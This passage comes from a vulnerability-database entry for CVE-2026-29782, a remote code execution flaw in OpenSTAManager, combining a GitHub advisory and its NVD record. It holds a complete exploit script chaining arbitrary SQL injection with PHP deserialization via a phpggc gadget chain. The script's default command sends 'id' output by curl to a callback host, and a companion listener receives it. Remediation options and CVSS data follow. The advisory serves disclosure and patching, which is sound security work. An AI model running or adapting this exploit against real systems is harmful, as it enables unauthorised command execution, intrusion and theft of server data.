(id,name,class,client_id,client_secret,config,state,access_token,after_configuration,is_login,enabled) VALUES (99999,\u0027poc\u0027,\u0027Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google\u0027,\u0027x\u0027,\u0027x\u0027,\u0027{}\u0027,\u0027poc-xxx\u0027,0x\u003cpayload_hex\u003e,\u0027\u0027,0,1)\",\"CREATE TABLE IF NOT EXISTS _t(i INT)\",\"DROP TABLE IF EXISTS _t\"]\n```\n\n**Step 5 \u2014 Trigger (NO authentication):**\n```\nGET /oauth2.php?state=poc-xxx\u0026code=x HTTP/1.1\n\n(No cookies \u2014 completely anonymous request)\n```\n\n**Response:** HTTP 500 (expected \u2014 the error occurs after `__destruct()` has already executed the command)\n\n### Exploit \u2014 `exploit.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOpenSTAManager v2.10.1 \u2014 RCE PoC (Arbitrary SQL \u2192 Insecure Deserialization)\n\nUsage:\n  python3 listener.py --port 9999\n  python3 exploit.py --target http://localhost:8888 --callback http://host.docker.internal:9999 --user admin --password Test1234\n\"\"\"\n\nimport argparse\nimport json\nimport random\nimport re\nimport string\nimport subprocess\nimport sys\nimport time\n\ntry:\n    import requests\nexcept ImportError:\n    print(\"[!] pip install requests\")\n    sys.exit(1)\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\nRESET = \"\\033[0m\"\n\nBANNER = f\"\"\"\n  {RED}{\u0027=\u0027 * 58}{RESET}\n  {RED}{BOLD}  OpenSTAManager v2.10.1 \u2014 RCE Proof of Concept{RESET}\n  {RED}{BOLD}  Arbitrary SQL \u2192 Insecure Deserialization{RESET}\n  {RED}{\u0027=\u0027 * 58}{RESET}\n\"\"\"\n\n\ndef log(msg, status=\"*\"):\n    icons = {\"*\": f\"{BLUE}*{RESET}\", \"+\": f\"{GREEN}+{RESET}\", \"-\": f\"{RED}-{RESET}\", \"!\": f\"{YELLOW}!{RESET}\"}\n    print(f\"  [{icons.get(status, \u0027*\u0027)}] {msg}\")\n\n\ndef step_header(num, title):\n    print(f\"\\n  {BOLD}\u2500\u2500 Step {num}: {title} \u2500\u2500{RESET}\\n\")\n\n\ndef generate_payload(container, command):\n    step_header(1, \"Generate Gadget Chain Payload\")\n\n    log(\"Checking phpggc in container...\")\n    result = subprocess.run([\"docker\", \"exec\", container, \"test\", \"-f\", \"/tmp/phpggc/phpggc\"], capture_output=True)\n    if result.returncode != 0:\n        log(\"Installing phpggc...\", \"!\")\n        proc = subprocess.run(\n            [\"docker\", \"exec\", container, \"git\", \"clone\", \"https://github.com/ambionics/phpggc\", \"/tmp/phpggc\"],\n            capture_output=True, text=True,\n        )\n        if proc.returncode != 0:\n            log(f\"Failed to install phpggc: {proc.stderr}\", \"-\")\n            sys.exit(1)\n\n    log(f\"Command: {DIM}{command}{RESET}\")\n\n    result = subprocess.run(\n        [\"docker\", \"exec\", container, \"php\", \"/tmp/phpggc/phpggc\", \"Laravel/RCE22\", \"system\", command],\n        capture_output=True,\n    )\n    if result.returncode != 0:\n        log(f\"phpggc failed: {result.stderr.decode()}\", \"-\")\n        sys.exit(1)\n\n    payload_bytes = result.stdout\n    log(f\"Payload: {BOLD}{len(payload_bytes)} bytes{RESET}\", \"+\")\n    return payload_bytes\n\n\ndef authenticate(target, username, password):\n    step_header(2, \"Authenticate\")\n    session = requests.Session()\n    log(f\"Logging in as \u0027{username}\u0027...\")\n\n    resp = session.post(\n        f\"{target}/index.php\",\n        data={\"op\": \"login\", \"username\": username, \"password\": password},\n        allow_redirects=False, timeout=10,\n    )\n\n    location = resp.headers.get(\"Location\", \"\")\n    if resp.status_code != 302 or \"index.php\" in location:\n        log(\"Login failed! Wrong credentials or brute-force lockout (3 attempts / 180s).\", \"-\")\n        sys.exit(1)\n\n    session.get(f\"{target}{location}\", timeout=10)\n    log(\"Authenticated\", \"+\")\n    return session\n\n\ndef find_module_id(session, target, container):\n    step_header(3, \"Find \u0027Aggiornamenti\u0027 Module ID\")\n    log(\"Searching navigation sidebar...\")\n    resp = session.get(f\"{target}/controller.php\", timeout=10)\n\n    for match in re.finditer(r\u0027id_module=(\\d+)\u0027, resp.text):\n        snippet = resp.text[match.start():match.start() + 300]\n        if re.search(r\u0027[Aa]ggiornamenti\u0027, snippet):\n            module_id = int(match.group(1))\n            log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n            return module_id\n\n    log(\"Not found in sidebar, querying database...\", \"!\")\n    result = subprocess.run(\n        [\"docker\", \"exec\", container, \"php\", \"-r\",\n         \"require \u0027/var/www/html/config.inc.php\u0027; \"\n         \"$pdo = new PDO(\u0027mysql:host=\u0027.$db_host.\u0027;dbname=\u0027.$db_name, $db_username, $db_password); \"\n         \"echo $pdo-\u003equery(\\\"SELECT id FROM zz_modules WHERE name=\u0027Aggiornamenti\u0027\\\")-\u003efetchColumn();\"],\n        capture_output=True, text=True,\n    )\n    if result.stdout.strip().isdigit():\n        module_id = int(result.stdout.strip())\n        log(f\"Module ID: {BOLD}{module_id}{RESET}\", \"+\")\n        return module_id\n\n    log(\"Could not find module ID\", \"-\")\n    sys.exit(1)\n\n\ndef inject_payload(session, target, module_id, payload_bytes, state_value):\n    step_header(4, \"Inject Payload via Arbitrary SQL\")\n\n    hex_payload = payload_bytes.hex()\n    record_id = random.randint(90000, 99999)\n\n    queries = [\n        f\"DELETE FROM zz_oauth2 WHERE id={record_id} OR state=\u0027{state_value}\u0027\",\n        f\"INSERT INTO zz_oauth2 \"\n        f\"(id, name, class, client_id, client_secret, config, \"\n        f\"state, access_token, after_configuration, is_login, enabled) VALUES \"\n        f\"({record_id}, \u0027poc\u0027, \u0027Modules\\\\\\\\Emails\\\\\\\\OAuth2\\\\\\\\Google\u0027, \"\n        f\"\u0027x\u0027, \u0027x\u0027, \u0027{{}}\u0027, \u0027{state_value}\u0027, 0x{hex_payload}, \u0027\u0027, 0, 1)\",\n        \"CREATE TABLE IF NOT EXISTS _poc_ddl_commit (i INT)\",\n        \"DROP TABLE IF EXISTS _poc_ddl_commit\",\n    ]\n\n    log(f\"State trigger: {BOLD}{state_value}{RESET}\")\n    log(f\"Payload: {len(hex_payload)//2} bytes ({len(hex_payload)} hex)\")\n    log(\"Sending to actions.php...\")\n\n    resp = session.post(\n        f\"{target}/actions.php\",\n        data={\"op\": \"risolvi-conflitti-database\", \"id_module\": str(module_id), \"id_record\": \"\", \"queries\": json.dumps(queries)},\n        timeout=15,\n    )\n\n    try:\n        result = json.loads(resp.text)\n        if result.get(\"success\"):\n            log(\"Payload planted in zz_oauth2.access_token\", \"+\")\n            return True\n        else:\n            log(f\"Injection failed: {result.get(\u0027message\u0027, \u0027?\u0027)}\", \"-\")\n            return False\n    except json.JSONDecodeError:\n        log(f\"Unexpected response (HTTP {resp.status_code}): {resp.text[:200]}\", \"-\")\n        return False\n\n\ndef trigger_rce(target, state_value):\n    step_header(5, \"Trigger RCE (NO AUTHENTICATION)\")\n\n    url = f\"{target}/oauth2.php\"\n    log(f\"GET {url}?state={state_value}\u0026code=x\")\n    log(f\"{DIM}(This request is UNAUTHENTICATED){RESET}\")\n\n    try:\n        resp = requests.get(url, params={\"state\": state_value, \"code\": \"x\"}, allow_redirects=False, timeout=15)\n        log(f\"HTTP {resp.status_code}\", \"+\")\n        if resp.status_code == 500:\n            log(f\"{DIM}500 expected: __destruct() fires the gadget chain before error handling{RESET}\")\n    except requests.exceptions.Timeout:\n        log(\"Timed out (command may still have executed)\", \"!\")\n    except requests.exceptions.ConnectionError as e:\n        log(f\"Connection error: {e}\", \"-\")\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"OpenSTAManager v2.10.1 \u2014 RCE PoC\")\n    parser.add_argument(\"--target\", required=True, help=\"Target URL\")\n    parser.add_argument(\"--callback\", required=True, help=\"Attacker listener URL reachable from the container\")\n    parser.add_argument(\"--user\", default=\"admin\", help=\"Username (default: admin)\")\n    parser.add_argument(\"--password\", required=True, help=\"Password\")\n    parser.add_argument(\"--container\", default=\"osm-web\", help=\"Docker web container (default: osm-web)\")\n    parser.add_argument(\"--command\", help=\"Custom command (default: curl callback with id output)\")\n    args = parser.parse_args()\n\n    print(BANNER)\n\n    target = args.target.rstrip(\"/\")\n    callback = args.callback.rstrip(\"/\")\n    state_value = \"poc-\" + \"\".join(random.choices(string.ascii_lowercase + string.digits, k=12))\n    command = args.command or f\"curl -s {callback}/rce-$(id|base64 -w0)\"\n\n    payload = generate_payload(args.container, command)\n    session = authenticate(target, args.user, args.password)\n    module_id = find_module_id(session, target, args.container)\n\n    if not inject_payload(session, target, module_id, payload, state_value):\n        log(\"Exploit failed at injection step\", \"-\")\n        sys.exit(1)\n\n    time.sleep(1)\n    trigger_rce(target, state_value)\n\n    print(f\"\\n  {BOLD}\u2500\u2500 Result \u2500\u2500{RESET}\\n\")\n    log(\"Exploit complete. Check your listener for the callback.\", \"+\")\n    log(\"Expected: GET /rce-\u003cbase64(id)\u003e\")\n    log(f\"If no callback, verify the container can reach: {callback}\", \"!\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Listener \u2014 `listener.py`\n\n```python\n#!/usr/bin/env python3\n\"\"\"OpenSTAManager v2.10.1 \u2014 RCE Callback Listener\"\"\"\n\nimport argparse\nimport base64\nimport sys\nfrom datetime import datetime\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\n\nRED = \"\\033[91m\"\nGREEN = \"\\033[92m\"\nYELLOW = \"\\033[93m\"\nBLUE = \"\\033[94m\"\nBOLD = \"\\033[1m\"\nRESET = \"\\033[0m\"\n\n\nclass CallbackHandler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        ts = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n        print(f\"\\n  {RED}{\u0027=\u0027 * 58}{RESET}\")\n        print(f\"  {RED}{BOLD}  RCE CALLBACK RECEIVED{RESET}\")\n        print(f\"  {RED}{\u0027=\u0027 * 58}{RESET}\")\n        print(f\"  {GREEN}[+]{RESET} Time : {ts}\")\n        print(f\"  {GREEN}[+]{RESET} From : {self.client_address[0]}:{self.client_address[1]}\")\n        print(f\"  {GREEN}[+]{RESET} Path : {self.path}\")\n\n        for part in self.path.lstrip(\"/\").split(\"/\"):\n            if part.startswith(\"rce-\"):\n                try:\n                    decoded = base64.b64decode(part[4:]).decode(\"utf-8\", errors=\"replace\")\n                    print(f\"  {GREEN}[+]{RESET} Output : {BOLD}{decoded}{RESET}\")\n                except Exception:\n                    print(f\"  {YELLOW}[!]{RESET} Raw : {part[4:]}\")\n\n        print(f\"  {RED}{\u0027=\u0027 * 58}{RESET}\\n\")\n        self.send_response(200)\n        self.send_header(\"Content-Type\", \"text/plain\")\n        self.end_headers()\n        self.wfile.write(b\"OK\")\n\n    def do_POST(self):\n        self.do_GET()\n\n    def log_message(self, format, *args):\n        pass\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=\"RCE callback listener\")\n    parser.add_argument(\"--port\", type=int, default=9999, help=\"Listen port (default: 9999)\")\n    args = parser.parse_args()\n\n    server = HTTPServer((\"0.0.0.0\", args.port), CallbackHandler)\n    print(f\"\\n  {BLUE}{\u0027=\u0027 * 58}{RESET}\")\n    print(f\"  {BLUE}{BOLD}  OpenSTAManager v2.10.1 \u2014 RCE Callback Listener{RESET}\")\n    print(f\"  {BLUE}{\u0027=\u0027 * 58}{RESET}\")\n    print(f\"  {GREEN}[+]{RESET} Listening on 0.0.0.0:{args.port}\")\n    print(f\"  {YELLOW}[!]{RESET} Waiting for callback...\\n\")\n\n    try:\n        server.serve_forever()\n    except KeyboardInterrupt:\n        print(f\"\\n  {YELLOW}[!]{RESET} Stopped.\")\n        sys.exit(0)\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n## Impact\n\n- **Confidentiality**: Read server files, database credentials, API keys\n- **Integrity**: Write files, install backdoors, modify application code\n- **Availability**: Delete files, denial of service\n- **Scope**: Command execution as `www-data` allows pivoting to other systems on the network\n\n## Proposed remediation\n\n### Option A: Restrict `unserialize()` (recommended)\n\n```php\n// src/Models/OAuth2.php \u2014 checkTokens() and getAccessToken()\n$access_token = $this-\u003eaccess_token\n    ? unserialize($this-\u003eaccess_token, [\u0027allowed_classes\u0027 =\u003e [AccessToken::class]])\n    : null;\n```\n\n### Option B: Use safe serialization\n\nReplace `serialize()`/`unserialize()` with `json_encode()`/`json_decode()` for storing OAuth2 tokens.\n\n### Option C: Authenticate `oauth2.php`\n\nRemove `$skip_permissions = true` and require authentication for the OAuth2 callback endpoint, or validate the `state` parameter against a value stored in the user\u0027s session.\n\n## Credits\nOmar Ramirez",
  "id": "GHSA-whv5-4q2f-q68g",
  "modified": "2026-04-06T17:17:57Z",
  "published": "2026-04-01T19:46:50Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29782"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    },
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OpenSTAManager Affected by Remote Code Execution via Insecure Deserialization in OAuth2"
}

FKIE_CVE-2026-29782

Vulnerability from fkie_nvd - Published: 2026-04-02 14:16 - Updated: 2026-04-07 21:19

Severity ?

7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc	Patch
security-advisories@github.com	https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2	Product, Release Notes
security-advisories@github.com	https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g	Exploit, Mitigation, Vendor Advisory

Impacted products

	Vendor	Product	Version
	devcode	openstamanager	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F",
              "versionEndExcluding": "2.10.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2."
    }
  ],
  "id": "CVE-2026-29782",
  "lastModified": "2026-04-07T21:19:46.627",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "HIGH",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 1.2,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-04-02T14:16:27.237",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/devcode-it/openstamanager/commit/d2e38cbdf91a831cefc0da1548e02b297ae644cc"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Product",
        "Release Notes"
      ],
      "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Mitigation",
        "Vendor Advisory"
      ],
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-whv5-4q2f-q68g"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-502"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-29782 (GCVE-0-2026-29782)

GHSA-WHV5-4Q2F-Q68G

Description

Affected code

Entry point — oauth2.php

Deserialization — src/Models/OAuth2.php

Execution flow

Full attack chain

Gadget chain

Proof of Concept

Execution

Observed result

HTTP requests from the exploit

Exploit — exploit.py

Listener — listener.py

Impact

Proposed remediation

Option A: Restrict unserialize() (recommended)

Option B: Use safe serialization

Option C: Authenticate oauth2.php

Credits

FKIE_CVE-2026-29782

Tags

Sightings

Nomenclature

Entry point — `oauth2.php`

Deserialization — `src/Models/OAuth2.php`

Exploit — `exploit.py`

Listener — `listener.py`

Option A: Restrict `unserialize()` (recommended)

Option C: Authenticate `oauth2.php`